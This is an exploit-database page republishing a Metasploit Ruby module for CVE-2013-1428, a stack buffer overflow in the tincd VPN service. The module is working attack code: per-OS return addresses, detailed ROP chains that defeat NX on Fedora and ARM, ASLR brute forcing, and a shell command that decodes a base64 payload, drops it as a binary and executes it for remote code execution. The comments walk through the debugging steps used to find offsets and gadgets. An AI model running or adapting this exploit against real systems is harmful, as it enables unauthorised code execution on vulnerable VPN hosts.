[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tincd Post-Authentication Remote TCP Stack Buffer Overflow Exploit

Author
metasploit
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-22960
Category
remote exploits
Date add
02-12-2014
CVE
CVE-2013-1428
Platform
multiple
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'securerandom'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::TincdExploitClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Tinc's tincd
        service. After authentication, a specially crafted tcp packet (default port 655)
        leads to a buffer overflow and allows to execute arbitrary code. This module has
        been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
        (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
        FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
        for all versions <= 1.1pre6.
        A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
        be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
        was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
        it was recommended to the maintainer to start using DEP/ASLR and other protection
        mechanisms.
      },
      'Author'         =>
        [
            # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
            'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch
            # original finding, python PoC crash
            'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342
        ],
      'References'     =>
        [
          ['CVE', '2013-1428'],
          ['OSVDB', '92653'],
          ['BID', '59369'],
          ['URL', 'http://www.floyd.ch/?p=741'],
          ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],
          ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 1675,
          'DisableNops' => true
        },
      'Privileged'     => true,
      'Targets'        =>
          [
            # full exploitation x86:
            ['Windows XP x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Windows 7 x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
            ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
              'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
              ],
            ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
              'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
              ],
            ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
            ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
            # full exploitation ARM:
            ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)',  {
              'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }
            ],
            ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)',  {
              'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }
            ],
            # crash only:
            ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)',  { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
          ],
      'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
      'DefaultTarget'  => 0))

    register_options(
        [ # Only for shellcodes that write binary to disk
          # Has to be short, usually either . or /tmp works
          # /tmp could be mounted as noexec
          # . is usually only working if tincd is running as root
          OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
          OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
          OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
        ], self
      )
  end

  def exploit
    # #
    # x86
    # #
    # WINDOWS XP and 7 full exploitation
    # Simple, we only need some mona.py magic
    # C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
    # !mona config -set workingfolder c:\logs\%p
    # !mona pc 1682
    #  --> C:\logs\tincd\pattern
    # !mona findmsp
    # Straight forward, when we overwrite EIP the second value
    # on the stack is pointing to our payload.
    # !mona findwild -o -type instr -s "pop r32# ret"

    # FREEBSD full exploitation
    # Same offset as windows, same exploitation method
    # But we needed a new pop r32# ret for the freebsd version
    # No mona.py help on bsd or linux so:
    # - Dumped .text part of tincd binary in gdb
    # - Search in hex editor for opcodes for "pop r32# ret":
    #  58c3, 59c3, ..., 5fc3
    # - Found a couple of 5dc3. ret = start of .text + offset in hex editor
    # - 0x0804BABB works very well

    # UBUNTU crash only
    # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
    # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
    # at compile time. gcc is introducing a call to __memcpy_chk:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
    # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
    # from the repository. It might be exploitable for versions compiled with an older version of gcc.
    # memcpy_chk seems to be in gcc since 2005:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088

    # OPENSUSE
    # OpenSuse 11.2
    # Installation as described on the tincd website. For 11.2 there are two versions.
    # Decided for 1.0.16 as this is a vulnerable version
    # wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
    # rpm -i tinc-1.0.16-3.1.i586.rpm
    # Again, strace shows us that the buffer overflow was detected (see Ubuntu)
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # So a crash-only non-exploitable bof here. So let's go for manual install:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
    # Exploitable. Let's see:
    # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
    # the offset to pop ebp; ret is 0x0804b07f

    # FEDORA
    # Fedora 16
    # yum has version 1.0.19
    # yum install tinc
    # Non-exploitable crash, see Ubuntu. Strace tells us:
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
    # Manual compile went on with Fedora 19
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
    # Don't forget to stop firewalld for testing, as the port is still closed otherwise
    # # hardening-check tincd
    # tincd:
    #  Position Independent Executable: no, normal executable!
    #  Stack protected: no, not found!
    #  Fortify Source functions: no, only unprotected functions found!
    #  Read-only relocations: yes
    #  Immediate binding: no, not found!
    # Running this module with target set to Windows:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x0041caa6 in ?? ()
    # well and that's our windows offset...
    # (gdb) info proc mappings
    # 0x8048000  0x8068000    0x20000        0x0 /usr/local/sbin/tincd
    # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
    # can try to execute the payload on the stack, but:
    # (gdb) stepi
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x08e8ee08 in ?? ()
    # Digging deeper we find:
    # dmesg | grep protection
    # [    0.000000] NX (Execute Disable) protection: active
    # or:
    # # objdump -x /usr/local/sbin/tincd
    # [...] STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
    #       filesz 0x00000000 memsz 0x00000000 flags rw-
    # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
    # Time for ROP
    # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
    # as a pointer to instructions). Was lucky after some searching:
    # (gdb) x/10i 0x4d10ee87
    #    0x4d10ee87:  pop    %ebx
    #    0x4d10ee88:  mov    $0xf5d299dd,%eax
    #    0x4d10ee8d:  rcr    %cl,%al
    #    0x4d10ee8f:  pop    %esp
    #    0x4d10ee90:  ret

    # ARCHLINUX
    # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # pacman -S gcc zlib lzo openssl make && ./configure && make && make install
    # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
    # -->Ret: 0x8065929
    # No NX protection, it simply runs the shellcode :)

    # #
    # ARM
    # #
    # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
    # Although this is more for the interested reader, as Pidora development
    # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
    # meaning it's an ARMv6 architecture
    # yum has fixed version 1.0.21, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
    # Is the binary protected?
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/local/sbin/tincd
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
    # No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /usr/local/sbin/tincd
    # so again NX... but what about the system things?
    #  cat /proc/sys/kernel/randomize_va_space
    # 2
    # --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
    #      This is the default setting."
    # Here some examples of the address of the system function:
    # 0xb6c40848
    # 0xb6cdd848
    # 0xb6c7c848
    # Looks like we would have to brute force one byte
    # (gdb) info proc mappings
    #  0x8000    0x23000    0x1b000          0         /usr/local/sbin/tincd
    # 0x2b000    0x2c000     0x1000    0x1b000         /usr/local/sbin/tincd
    # When we exploit we get the following:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x90909090 in ?? ()
    # ok, finally a different offset to eip. Let's figure it out:
    # $ tools/pattern_create.rb 1676
    # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
    # (gdb) break *0x9000
    # Breakpoint 1 at 0x9000
    # See that our shellcode is *on* the stack:
    # (gdb) x/10x $sp
    # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
    # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
    # 0xbee14328: 0xe3a02006 0xe3a07001
    # let's explore the code we can reuse:
    # (gdb) info functions
    # objdump -d /usr/local/sbin/tincd >assembly.txt
    # while simply searching for the bx instruction we were not very lucky,
    # but searching for some "pop pc" it's easy to find nice gadgets.
    # we can write arguments to the .data section again:
    # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
    # The problem is we can not reliably forecast the system function's address, but it's
    # only one byte random, therefore we have to brute force it and/or find a memory leak.
    # Let's assume it's a restarting daemon:
    # create /etc/systemd/system/tincd.service and fill in Restart=restart-always

    # ARM Debian Wheezy on qemu
    # root@debian:~# apt-cache showpkg tinc
    # Package: tinc
    # Versions:
    # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
    # nice, that's vulnerable
    # apt-get install tinc
    # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/sbin/tincd
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
    # Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /usr/sbin/tincd
    # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here

    packet_payload = payload.encoded
    # Pidora and Fedora/ROP specific things
    if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
      rop_generator = nil
      filename = rand_text_alpha(1)
      cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
      cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'

      if target.name =~ /Pidora 18/
        print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
        print_status('This requires a restarting tincd daemon!')
        print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
        rop_generator = method(:create_pidora_rop)
      elsif target.name =~ /Fedora 19/
        print_status('Using ROP to defeat NX on Fedora 19')
        rop_generator = method(:create_fedora_rop)
      end

      if target.arch.include? ARCH_CMD
        # The CMD payloads are a bit tricky on Fedora. As of december 2013
        # some of the generic unix payloads (e.g. reverse shell with awk) don't work
        # (even when executed directly in a terminal on Fedora)
        # use generic/custom and specify PAYLOADSTR without single quotes
        # it's usually sh -c *bla*
        packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
      else
        # the binary drop payloads
        packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
        if packet_payload.length > target['offset']
          print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
          packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
          vprint_status("Achieved version with #{packet_payload.length} bytes")
        end
      end
    end

    if packet_payload.length > target['offset']
      fail_with(Exploit::Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
    end
    injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')

    vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")

    if target.name =~ /Pidora 18/
      # we have to brute force to defeat ASLR
      datastore['BRUTEFORCE_TRIES'].times do
        print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
        setup_ciphers
        print_status('Telling tinc exploit client to connect, handshake and send the payload')
        begin
          send_recv(injection)
        rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
          print_error(runtime_error.message)
          print_error(runtime_error.backtrace.join("\n\t"))
        rescue Rex::ConnectionRefused
          print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
          sleep(3)
          next
        end
        secs = datastore['WAIT']
        print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
        sleep(secs)
      end
      print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
    else
      # Setup local ciphers
      print_status('Initializing tinc exploit client (setting up ciphers)')
      setup_ciphers
      # The tincdExploitClient will do the crypto handshake with the server and
      # send the injection (a packet), where the actual buffer overflow is triggered
      print_status('Telling tinc exploit client to connect, handshake and send the payload')
      send_recv(injection)
    end
    print_status('Exploit finished')
  end

  def get_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
  end

  def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
  end

  def create_pidora_rop(sys_execv_args)
    sys_execv_args = sys_execv_args.join(' ')
    sys_execv_args += "\x00"

    aslr_byte_guess = SecureRandom.random_bytes(1).ord
    print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")

    # Gadgets tincd
    # c714:  e1a00004   mov  r0, r4
    # c718:  e8bd8010   pop  {r4, pc}
    mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
    pop_r4_ret = [0x0000c718].pack('V')
    # 1cef4:  e580400c   str  r4, [r0, #12]
    # 1cef8:  e8bd8010   pop  {r4, pc}
    # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')

    # bba0:  e5843000   str  r3, [r4]
    # bba4:  e8bd8010   pop  {r4, pc}
    mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')

    # 13ccc:  e1a00003   mov  r0, r3
    # 13cd0:  e8bd8008   pop  {r3, pc}
    pop_r3_ret = [0x00013cd0].pack('V')

    # address to start rop (removing 6 addresses of garbage from stack)
    # 15cb4:  e8bd85f0   pop  {r4, r5, r6, r7, r8, sl, pc}
    # start_rop = [0x00015cb4].pack('V')
    # see target Ret

    # system function address base to brute force
    # roughly 500 tests showed addresses between
    # 0xb6c18848 and 0xb6d17848 (0xff distance)
    system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')

    # pointer into .data section
    loc_dot_data = 0x0002b3f0 # a location inside .data

    # Rop into system(), prepare address of payload in r0
    rop = ''

    # first, let's put the payload into the .data section

    # Put the first location to write to in r4
    rop += pop_r4_ret

    sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
      # Give location inside .data via stack
      rop += [loc_dot_data + i * 4].pack('V')
      # Pop 4 bytes of the command into r3
      rop += pop_r3_ret
      # Give 4 bytes of command on stack
      if argument_part.length == 4
        rop += argument_part
      else
        rop += argument_part + rand_text_alpha(4 - argument_part.length)
      end
      # Write the 4 bytes to the writable location
      rop += mov_to_r4_addr_pop_r4_ret
    end

    # put the address of the payload into r4
    rop += [loc_dot_data].pack('V')

    # now move r4 to r0
    rop += mov_r0_r4_pop_r4_ret
    rop += rand_text_alpha(4)
    # we don't care what ends up in r4 now

    # call system
    rop += system_addr
  end

  def create_fedora_rop(sys_execv_args)
    # Gadgets tincd
    loc_dot_data = 0x80692e0 # a location inside .data
    pop_eax = [0x8065969].pack('V') # pop eax; ret
    pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
    pop_ecx = [0x804e113].pack('V') # pop ecx; ret
    xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
    # <ATTENTION> This one destroys ebx:
    mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
    # </ATTENTION>

    # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
    xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
    # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
    # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret

    # Gadgets libc.so.6 libc-2.17.so
    pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
    int_80 = [0x4b6049c5].pack('V') # int 0x80

    # Linux kernel system call 11: sys_execve
    # ROP
    rop = ''

    index = 0
    stored_argument_pointer_offsets = []

    sys_execv_args.each_with_index do |argument, argument_no|
      stored_argument_pointer_offsets << index
      argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
        # Put location to write to in eax
        rop += pop_eax
        # Give location inside .data via stack
        rop += [loc_dot_data + index + i * 4].pack('V')
        # Pop 4 bytes of the command into ecx
        rop += pop_ecx
        # Give 4 bytes of command on stack
        if argument_part.length == 4
          rop += argument_part
        else
          rop += argument_part + rand_text_alpha(4 - argument_part.length)
        end
        # Write the 4 bytes to the writable location
        rop += mov_to_eax_addr
      end
      # We have to end the argument with a zero byte
      index += argument.length
      # We don't have "xor ecx, ecx", but we have it for eax...
      rop += xor_eax_eax
      rop += xchg_ecx_eax
      # Put location to write to in eax
      rop += pop_eax
      # Give location inside .data via stack
      rop += [loc_dot_data + index].pack('V')
      # Write the zeros
      rop += mov_to_eax_addr
      index += 1 # where we can write the next argument
    end

    # Append address of the start of each argument
    stored_argument_pointer_offsets.each do |offset|
      rop += pop_eax
      rop += [loc_dot_data + index].pack('V')
      rop += pop_ecx
      rop += [loc_dot_data + offset].pack('V')
      rop += mov_to_eax_addr
      index += 4
    end
    # end with zero
    rop += xor_eax_eax
    rop += xchg_ecx_eax

    rop += pop_eax
    rop += [loc_dot_data + index].pack('V')
    rop += mov_to_eax_addr

    rop += pop_ebx
    rop += [loc_dot_data].pack('V')

    rop += pop_ecx
    rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')

    rop += pop_edx
    rop += [loc_dot_data + index].pack('V')

    # sys call 11 = sys_execve
    rop += pop_eax
    rop += [0x0000000b].pack('V')

    rop += int_80
  end
end

#  0day.today [2024-12-25]  #